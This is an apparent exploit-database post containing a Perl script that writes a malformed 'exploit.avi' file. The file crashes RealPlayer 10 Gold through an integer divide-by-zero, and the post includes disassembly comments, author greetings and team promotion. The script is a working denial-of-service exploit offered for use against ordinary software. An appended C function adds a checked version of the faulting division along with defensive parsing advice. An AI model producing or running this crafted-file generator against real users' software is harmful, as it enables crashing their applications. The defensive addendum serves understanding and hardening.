
Real Player 10 Gold Exception Handling

Posted on 28 June 2012

#!/usr/bin/perl
#
# Exploit database separated by exploit type (local, remote, DoS, etc.)
# [x] Official Website: http://www.1337day.com
# [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com
# ==========================================
# I'm Dark-Puzzle From Inj3ct0r TEAM
# dark-puzzle[at]live[at]fr
# ==========================================
# Pentesting/exploit coding/bug research
#
# [0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]
# Exploit Title: Real Player 10 GOLD - Exception Handling Vulnerability .
# Author: Dark-Puzzle .
# Danger : Medium .
# Category : Local Exploit .
# Version: Latest : 10 GOLD (Other versions aren't tested yet )
# Vendor : http://www.real.com/
# Software Link : http://www.oldapps.com/real.php?old_real_player=12?download
# Date: 27 June 2012 .
#------------------------------------------------------------------------#
#                                                                        #
#                     Usage : perl realplayer.pl                         #
#                                                                        #
#------------------------------------------------------------------------#

my $h = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00" .
"\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb" .
"\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50" .
"\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e" .
"\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2" .
"\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2" .
"\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29" .
"\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53" .
"\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad" .
"\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff";

#[Disassembly]
#"\x0C\x20\x87\x74"  PUSH EBX
#"\x0D\x20\x87\x74"  MOV EAX,DWORD PTR SS:[EBP+8]
#"\x10\x20\x87\x74"  MOV EBX,DWORD PTR SS:[EBP+C]
#"\x13\x20\x87\x74"  MOV ECX,DWORD PTR SS:[EBP+10]
#"\x16\x20\x87\x74"  MUL EBX
#"\x18\x20\x87\x74"  MOV EBX,ECX
#"\x1A\x20\x87\x74"  SHR EBX,1
#"\x1C\x20\x87\x74"  ADD EAX,EBX
#"\x1E\x20\x87\x74"  ADC EDX,0
#"\x21\x20\x87\x74"  DIV ECX   <<---- As we see we can't divide by Zero. So this causes an error and the program crashes here.
#[Registers]
#EAX 00000000
#ECX 00000000
#EDX 00000000
#EBX 00000000
# error : Integer Division by Zero ---> Exception handling vulnerability .
# This Exception handling can lead to a DOS attack . However the concept of using this vulnerability is to create an exception so the program crashes. And it's a local exploit .

my $file = "exploit.avi";
# Three-argument open in binary mode so the bytes are written unchanged
open(my $File, '>', $file) or die "Cannot open $file: $!";
binmode($File);
print $File $h;
close($File);
print "0/// Exploit By Dark-Puzzle !\n";
print "1/// Follow me : http://fb.me/dark.puzzle\n";
print "0/// avi file Created Enjoy!\n";
print "N.B : If the program says to locate the file just browse into its directory and select it , if not , Enjoy\n";
# End Of Exploit
#------------------------------------------------------------------------
#Dark-Puzzle (Souhail) .
#\x90
#Follow me : fb.me/dark.puzzle
#\x90
#Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
#\x90
#Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstormsecurity.org , Ar-Devlopers....
#\x90
#Pentesting is my LIFE .
#\x90
#GREY HAT Mercy From M0rocC0 .
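The instruction sequence in the [Disassembly] comments computes (a * b + c / 2) / c, and the x86 DIV instruction raises a divide error both when the divisor is zero and when the quotient does not fit in EAX. The C function below is an added example of a checked equivalent, not code from the original post or from the vendor; the function name and the argument names a, b, c (standing for [EBP+8], [EBP+C], [EBP+10]) are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Checked form of the listed sequence (hypothetical name, not vendor code):
 *   MUL EBX               -> EDX:EAX = a * b       (64-bit product)
 *   SHR EBX,1 / ADD / ADC -> product += c / 2      (round to nearest)
 *   DIV ECX               -> quotient = product / c
 * Returns false instead of faulting; *out is written only on success.
 */
bool muldiv_round_checked(uint32_t a, uint32_t b, uint32_t c, uint32_t *out)
{
    if (c == 0)                     /* the crash case: ECX = 00000000 */
        return false;

    /* Max value is (2^32-1)^2 + 2^31-1, which still fits in 64 bits. */
    uint64_t wide = (uint64_t)a * b + (c >> 1);
    uint64_t q = wide / c;

    if (q > UINT32_MAX)             /* DIV also faults when the quotient exceeds 32 bits */
        return false;

    *out = (uint32_t)q;
    return true;
}

int main(void)
{
    /* Constructed inputs; the first row is the register state shown in the post. */
    const uint32_t cases[][3] = {
        {0, 0, 0}, {10, 3, 4}, {UINT32_MAX, UINT32_MAX, 1},
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        uint32_t r = 0;
        if (muldiv_round_checked(cases[i][0], cases[i][1], cases[i][2], &r))
            printf("(%u * %u) / %u = %u\n", (unsigned)cases[i][0],
                   (unsigned)cases[i][1], (unsigned)cases[i][2], (unsigned)r);
        else
            printf("(%u * %u) / %u rejected: input would fault in DIV\n",
                   (unsigned)cases[i][0], (unsigned)cases[i][1],
                   (unsigned)cases[i][2]);
    }
    return 0;
}
```

A file parser that receives false from such a helper should treat the file as malformed and stop processing it, rather than relying on an exception handler to recover.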

 
